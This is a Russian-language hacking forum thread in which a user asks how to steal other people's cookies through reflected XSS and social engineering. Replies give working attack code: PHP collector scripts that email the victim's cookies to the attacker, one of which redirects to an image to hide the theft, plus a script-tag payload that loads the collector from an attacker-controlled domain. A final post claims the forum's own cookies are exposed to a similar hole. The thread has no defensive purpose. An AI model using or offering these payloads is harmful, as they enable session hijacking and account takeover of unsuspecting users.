Вопрос Как получить куки через пассивный XSS

Тема в разделе "Уязвимости и взлом", создана пользователем Ibragim30, 18 ноя 2017.

  1. Ibragim30

    Ibragim30

    Сообщения:
    3
    Баллы:
    1
    Всем привет. Подскажите, как можно получить cookies другого человека с помощью социальной инженерии ?
    Вроде есть XSS методы ?!

    Спасибо
  2. Arty

    Arty

    Сообщения:
    30
    Баллы:
    1
    Юзай iframe на твой сайт, где аргументом будут куки пользователя, а на сайте сохраняй в документ или БД(по желанию)
  3. Ibragim30

    Ibragim30

    Сообщения:
    3
    Баллы:
    1
    Сайта своего нет, интересует пассивный XSS
  4. Arty

    Arty

    Сообщения:
    30
    Баллы:
    1
    А чем по твоему пассивный от активного отличается? Напиши небольшой скрипт на php, и благодаря пассивному XSS добавь на страницу тег iframe открывающий твою страницу(установи её на hostinger'е) и передающий куки как аргумент который будет сохранён.
  5. Messiah

    Messiah Команда форума Внесен депозит 4000$

    Сообщения:
    762
    Баллы:
    18
  6. Web kit

    Web kit

    Сообщения:
    18
    Баллы:
    1
    Создаём ftp сервер / затем создаём файл index.php
    Открываем пишем
    PHP:
    <?php
    $cookie
    = $_SERVER['HTTP_COOKIE'];
    mail('ваша почта', 'cook', $cookie);
    ?>

    Затем вставляем там где xss
    HTML:
    <script src="https://домен.ру/index.php"></script>
    Если скрипт блокинирует попробуй линк
    HTML:
    <link src="домен.ру/index.php" />
  7. Web kit

    Web kit

    Сообщения:
    18
    Баллы:
    1
    Да там написано как их выводить в ссылку, а как их от туда получить не написал, там надо было ставить ссылку на пхп файл, потом когда кто-то посмотрит изображение его отправят по ссылке к пхп файлу с куками на ссылке, пхп скрипт возьмет эти куки и сохранит на сервере, далее дела header('location:ссылка на изображение') - благодаря этому когда мы отправим нашу вредосную ссылку с пхп скрипом на странице всё равно будет показана наше изображение которые мы задали в header
    В общем код будет такой:
    PHP:
    <?php
    //берем куки с ссылки
    $cookie = $_SERVER['REQUEST_URI'];
    //Отправляем их на нашу почту
    mail('твоя почта', '123', $cookie);
    //После отправки ссылки пхп файла будет показана картинка которая мы указали в header
    header('Location:ссылка на картинку');
    ?>
  8. Web kit

    Web kit

    Сообщения:
    18
    Баллы:
    1
    Да и на вашем сайте тоже по-моему есть похожая уязвимость + у вас куки не защищены. Можно получить доступ к любому пользователю только там и си в помошь ( это не фишинг)

Поделиться этой страницей

Top